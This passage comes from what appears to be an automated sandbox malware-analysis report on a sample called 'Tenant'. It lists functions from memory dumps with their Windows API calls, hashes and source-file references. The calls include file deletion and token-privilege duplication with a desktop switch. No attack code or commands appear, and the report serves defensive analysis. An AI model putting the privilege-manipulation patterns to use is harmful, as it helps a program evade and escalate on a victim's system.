                                                                                        • Instruction Fuzzy Hash: 8A114C76204601DFC724CF28D591E56FBF9FF4A354B60882EE49ACB262E732E841CB50
                                                                                        Function 00ADE3C2 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: ClearVariant
                                                                                        • String ID:
                                                                                        • API String ID: 1473721057-0
                                                                                        • Opcode ID: b8326261037189eaf86b4440878238d888020b554341d48d957ba5b1a343936d
                                                                                        • Instruction ID: d73c8ac35662bc9c91e8235ff36268c522463797b2a322d71d53cbcb0df30b95
                                                                                        • Opcode Fuzzy Hash: b8326261037189eaf86b4440878238d888020b554341d48d957ba5b1a343936d
                                                                                        • Instruction Fuzzy Hash: DE21F0B4A08341DFCB14DF14C544B5ABBE5BF89304F09896CE88A57362C731E849CB96
                                                                                        Function 00AFFEF8 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: _memmove
                                                                                        • String ID:
                                                                                        • API String ID: 4104443479-0
                                                                                        • Opcode ID: 0395b2a835dbff9dd1549838c9731aea477c68174e31b915e9f67382827cc5ea
                                                                                        • Instruction ID: be3d086ae078a10fbccec4e071381d70466fd08aaccbf39fd255c5ebbc59ab12
                                                                                        • Opcode Fuzzy Hash: 0395b2a835dbff9dd1549838c9731aea477c68174e31b915e9f67382827cc5ea
                                                                                        • Instruction Fuzzy Hash: A2018172200225ABCB24DF2DD991E7BB7A9EF86364714856EF90ACB245E631E901C7D0
                                                                                        Function 00B1495B Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetEnvironmentVariableW.KERNEL32(?,?,00007FFF,00000000), ref: 00B14998
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: EnvironmentVariable
                                                                                        • String ID:
                                                                                        • API String ID: 1431749950-0
                                                                                        • Opcode ID: 39e10aa0264438dc846e27f389413b1a85f45133e07c8b49cfcee20650933ff5
                                                                                        • Instruction ID: 2d35b1bd2701178762b3f05e7a2d2dba7bfbce066e2db0fc6c44558c34348a7e
                                                                                        • Opcode Fuzzy Hash: 39e10aa0264438dc846e27f389413b1a85f45133e07c8b49cfcee20650933ff5
                                                                                        • Instruction Fuzzy Hash: 13F03135608108AFCB14FB65D946D9F7BFCEF49320B00405AF8049B2A2DE71BD81C754
                                                                                        Function 00B07C7F Relevance: 1.5, APIs: 1, Instructions: 39COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00AC0FE6: std::exception::exception.LIBCMT ref: 00AC101C
                                                                                          • Part of subcall function 00AC0FE6: __CxxThrowException@8.LIBCMT ref: 00AC1031
                                                                                        • _memset.LIBCMT ref: 00B07CB4
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: Exception@8Throw_memsetstd::exception::exception
                                                                                        • String ID:
                                                                                        • API String ID: 525207782-0
                                                                                        • Opcode ID: 3ecc4d077f8347220a40a240f02962e6a21ded5fff4d928bb21853c154afc254
                                                                                        • Instruction ID: 86b9e0e4163eb0c67165a368ed061043f86997f533378188d998589f8c0f9fc3
                                                                                        • Opcode Fuzzy Hash: 3ecc4d077f8347220a40a240f02962e6a21ded5fff4d928bb21853c154afc254
                                                                                        • Instruction Fuzzy Hash: 9C01EF75608200DFD321EF5CDA41F4ABBE5EF59310F25849EF5988B3A2DB72A8408B91
                                                                                        Function 00ADDC5A Relevance: 1.5, APIs: 1, Instructions: 32COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00AC0FE6: std::exception::exception.LIBCMT ref: 00AC101C
                                                                                          • Part of subcall function 00AC0FE6: __CxxThrowException@8.LIBCMT ref: 00AC1031
                                                                                        • _memmove.LIBCMT ref: 00ADDC8B
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: Exception@8Throw_memmovestd::exception::exception
                                                                                        • String ID:
                                                                                        • API String ID: 1602317333-0
                                                                                        • Opcode ID: 45a849d2a6824c2a98c98ed0063ef32583db97a8290c264e89d73d06c63a9186
                                                                                        • Instruction ID: 58d28451ba8443fdbd482e40d285673d377ee2cb7fb94478bea801d43e70d266
                                                                                        • Opcode Fuzzy Hash: 45a849d2a6824c2a98c98ed0063ef32583db97a8290c264e89d73d06c63a9186
                                                                                        • Instruction Fuzzy Hash: 18F0F974604101DFD720DF68CA81E19BBF1BF5A300B25849CF1998B3A2E772EC51CB91
                                                                                        Function 00AB4A8C Relevance: 1.5, APIs: 1, Instructions: 31COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: _fseek
                                                                                        • String ID:
                                                                                        • API String ID: 2937370855-0
                                                                                        • Opcode ID: d626904f6cb88cfd62378aba53a4cab051f17c1c31bafaeec442f62cde18398f
                                                                                        • Instruction ID: de26afb6196f0155765479827f30ba5fab3bab85ccee8c4d999289b37b827e13
                                                                                        • Opcode Fuzzy Hash: d626904f6cb88cfd62378aba53a4cab051f17c1c31bafaeec442f62cde18398f
                                                                                        • Instruction Fuzzy Hash: FAF08CB6400208BFDF108F95DC04DEB7B7DEF89320F00419CF9045A111D272EA218BA0
                                                                                        Function 00AB4A2F Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • FreeLibrary.KERNEL32(?,?,?,00AB27AF,?,00000001), ref: 00AB4A63
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: FreeLibrary
                                                                                        • String ID:
                                                                                        • API String ID: 3664257935-0
                                                                                        • Opcode ID: 6f094e21fd91618d5109f7bea88fd90e36c0a787ab1b89be7d814e3e6d1c9293
                                                                                        • Instruction ID: 38c8869cc3cc9a2c10d0ae2574851928514fd96c4789a04c0c8fdf6dbac4f8f5
                                                                                        • Opcode Fuzzy Hash: 6f094e21fd91618d5109f7bea88fd90e36c0a787ab1b89be7d814e3e6d1c9293
                                                                                        • Instruction Fuzzy Hash: 58F01571145701CFCB349F64E49089ABBF8AF18365320892EE1D683612C731A984DB44
                                                                                        Function 00AB4AB2 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: __fread_nolock
                                                                                        • String ID:
                                                                                        • API String ID: 2638373210-0
                                                                                        • Opcode ID: 1a81c16e28573863898c67bef1386d759a1651ff521f05548b9e3597368886a1
                                                                                        • Instruction ID: 3ead3183b9ebd1685496ab7bdf762cc5798c484baab919467904f8f2786529b4
                                                                                        • Opcode Fuzzy Hash: 1a81c16e28573863898c67bef1386d759a1651ff521f05548b9e3597368886a1
                                                                                        • Instruction Fuzzy Hash: EFF0F87640020DFFDF05CF94C941EAABB79FB18314F208589F9198A212D376EA61AB91
                                                                                        Function 00AE0A79 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: ClearVariant
                                                                                        • String ID:
                                                                                        • API String ID: 1473721057-0
                                                                                        • Opcode ID: f5bbc7690d3e444d2ed0592125d86932c9c2ea9f441ebe4a17b499a881acf91d
                                                                                        • Instruction ID: e565a6430b27cf00b938fdd53b2c2dce114712fa5f7500c76e692a5f96a08b3a
                                                                                        • Opcode Fuzzy Hash: f5bbc7690d3e444d2ed0592125d86932c9c2ea9f441ebe4a17b499a881acf91d
                                                                                        • Instruction Fuzzy Hash: C1E02B717083C65EE7309B669804F66FBE4AF81314F20842AD4D583281E7F558D49BA1
                                                                                        Function 00AC09C5 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 00AC09E4
                                                                                          • Part of subcall function 00AB1821: _memmove.LIBCMT ref: 00AB185B
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: LongNamePath_memmove
                                                                                        • String ID:
                                                                                        • API String ID: 2514874351-0
                                                                                        • Opcode ID: 1283f4f30fdd87bcf0ae301c98a4a9f0f2a74f913f5cd55cf7dbb6e5d105dbb9
                                                                                        • Instruction ID: 8296c554ae6be0c9551abfc1e1355b2235b92c61f8a7203084b15afd08295ee3
                                                                                        • Opcode Fuzzy Hash: 1283f4f30fdd87bcf0ae301c98a4a9f0f2a74f913f5cd55cf7dbb6e5d105dbb9
                                                                                        • Instruction Fuzzy Hash: 21E0863290022857C721A6989C15FEE77DDEF89690F0401B7FC09D7304D9649C8186D1
                                                                                        Function 00B04FEC Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetFileAttributesW.KERNEL32(?,00B03BFE), ref: 00B04FED
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: AttributesFile
                                                                                        • String ID:
                                                                                        • API String ID: 3188754299-0
                                                                                        • Opcode ID: f7b1f5130b61101195a4d54178d457f9aeccd7e7599ad0a5d99b72b181bcc78c
                                                                                        • Instruction ID: c646369cd2f9a03df364a469e0c31d6a1c23d121237a80823bcc231831ef9c3a
                                                                                        • Opcode Fuzzy Hash: f7b1f5130b61101195a4d54178d457f9aeccd7e7599ad0a5d99b72b181bcc78c
                                                                                        • Instruction Fuzzy Hash: D9B092B4010A0257DD282E3C195809D3B819C423A97E81BC1E57C964E197398C5BA520
                                                                                        Function 00AC547B Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: __wfsopen
                                                                                        • String ID:
                                                                                        • API String ID: 197181222-0
                                                                                        • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                                                        • Instruction ID: 70d0865bcd1878cec7b123bcfb3ff5b76d9e1c354b54727a9d932684d7219bf3
                                                                                        • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                                                        • Instruction Fuzzy Hash: 7BB0927684020C77CE012A92ED03F593B2E9B40669F408020FB0C1C162A673A6A09689
                                                                                        Function 00B0C270 Relevance: 1.3, APIs: 1, Instructions: 31COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00B04005: FindFirstFileW.KERNEL32(?,?), ref: 00B0407C
                                                                                          • Part of subcall function 00B04005: DeleteFileW.KERNEL32(?,?,?,?), ref: 00B040CC
                                                                                          • Part of subcall function 00B04005: FindNextFileW.KERNELBASE(00000000,00000010), ref: 00B040DD
                                                                                          • Part of subcall function 00B04005: FindClose.KERNEL32(00000000), ref: 00B040F4
                                                                                        • GetLastError.KERNEL32 ref: 00B0C292
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: FileFind$CloseDeleteErrorFirstLastNext
                                                                                        • String ID:
                                                                                        • API String ID: 2191629493-0
                                                                                        • Opcode ID: 42ca1a4a3c4f078f14eaae932b70cd2592e8be394d249fed86af402a676a9c4c
                                                                                        • Instruction ID: a0040e297a7a7d251838c0708c5821d55daa37f1a6a14d87b79cbd567361f858
                                                                                        • Opcode Fuzzy Hash: 42ca1a4a3c4f078f14eaae932b70cd2592e8be394d249fed86af402a676a9c4c
                                                                                        • Instruction Fuzzy Hash: 13F08C322106109FCB10EF59D850B6ABBE9AF89320F058059FA099B392CB70BC01CB94

                                                                                        Non-executed Functions

                                                                                        Function 00B2D164 Relevance: 74.1, APIs: 40, Strings: 2, Instructions: 637windowkeyboardCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00AA29E2: GetWindowLongW.USER32(?,000000EB), ref: 00AA29F3
                                                                                        • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 00B2D208
                                                                                        • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00B2D249
                                                                                        • GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 00B2D28E
                                                                                        • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00B2D2B8
                                                                                        • SendMessageW.USER32 ref: 00B2D2E1
                                                                                        • _wcsncpy.LIBCMT ref: 00B2D359
                                                                                        • GetKeyState.USER32(00000011), ref: 00B2D37A
                                                                                        • GetKeyState.USER32(00000009), ref: 00B2D387
                                                                                        • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00B2D39D
                                                                                        • GetKeyState.USER32(00000010), ref: 00B2D3A7
                                                                                        • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00B2D3D0
                                                                                        • SendMessageW.USER32 ref: 00B2D3F7
                                                                                        • SendMessageW.USER32(?,00001030,?,00B2B9BA), ref: 00B2D4FD
                                                                                        • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 00B2D513
                                                                                        • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00B2D526
                                                                                        • SetCapture.USER32(?), ref: 00B2D52F
                                                                                        • ClientToScreen.USER32(?,?), ref: 00B2D594
                                                                                        • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 00B2D5A1
                                                                                        • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00B2D5BB
                                                                                        • ReleaseCapture.USER32 ref: 00B2D5C6
                                                                                        • GetCursorPos.USER32(?), ref: 00B2D600
                                                                                        • ScreenToClient.USER32(?,?), ref: 00B2D60D
                                                                                        • SendMessageW.USER32(?,00001012,00000000,?), ref: 00B2D669
                                                                                        • SendMessageW.USER32 ref: 00B2D697
                                                                                        • SendMessageW.USER32(?,00001111,00000000,?), ref: 00B2D6D4
                                                                                        • SendMessageW.USER32 ref: 00B2D703
                                                                                        • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00B2D724
                                                                                        • SendMessageW.USER32(?,0000110B,00000009,?), ref: 00B2D733
                                                                                        • GetCursorPos.USER32(?), ref: 00B2D753
                                                                                        • ScreenToClient.USER32(?,?), ref: 00B2D760
                                                                                        • GetParent.USER32(?), ref: 00B2D780
                                                                                        • SendMessageW.USER32(?,00001012,00000000,?), ref: 00B2D7E9
                                                                                        • SendMessageW.USER32 ref: 00B2D81A
                                                                                        • ClientToScreen.USER32(?,?), ref: 00B2D878
                                                                                        • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00B2D8A8
                                                                                        • SendMessageW.USER32(?,00001111,00000000,?), ref: 00B2D8D2
                                                                                        • SendMessageW.USER32 ref: 00B2D8F5
                                                                                        • ClientToScreen.USER32(?,?), ref: 00B2D947
                                                                                        • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00B2D97B
                                                                                          • Part of subcall function 00AA29AB: GetWindowLongW.USER32(?,000000EB), ref: 00AA29BC
                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00B2DA17
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                                                        • String ID: @GUI_DRAGID$F
                                                                                        • API String ID: 3977979337-4164748364
                                                                                        • Opcode ID: a171fe550a5cc447abd9aa396c42cd24e4d23460c976d7be9a5ece5ce0be1e91
                                                                                        • Instruction ID: b086269a05fb4fb0cdc25ec45e64cfaf526942c61702c2b35733a94dd3efbf44
                                                                                        • Opcode Fuzzy Hash: a171fe550a5cc447abd9aa396c42cd24e4d23460c976d7be9a5ece5ce0be1e91
                                                                                        • Instruction Fuzzy Hash: 4042CF302083519FD724DF28D894B6ABBE5FF89310F140699F659972E0CB71EC64CB92
                                                                                        Function 00AF8F2E Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 224COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00AF9399: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00AF93E3
                                                                                          • Part of subcall function 00AF9399: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00AF9410
                                                                                          • Part of subcall function 00AF9399: GetLastError.KERNEL32 ref: 00AF941D
                                                                                        • _memset.LIBCMT ref: 00AF8F71
                                                                                        • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 00AF8FC3
                                                                                        • CloseHandle.KERNEL32(?), ref: 00AF8FD4
                                                                                        • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00AF8FEB
                                                                                        • GetProcessWindowStation.USER32 ref: 00AF9004
                                                                                        • SetProcessWindowStation.USER32(00000000), ref: 00AF900E
                                                                                        • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00AF9028
                                                                                          • Part of subcall function 00AF8DE9: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00AF8F27), ref: 00AF8DFE
                                                                                          • Part of subcall function 00AF8DE9: CloseHandle.KERNEL32(?,?,00AF8F27), ref: 00AF8E10
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
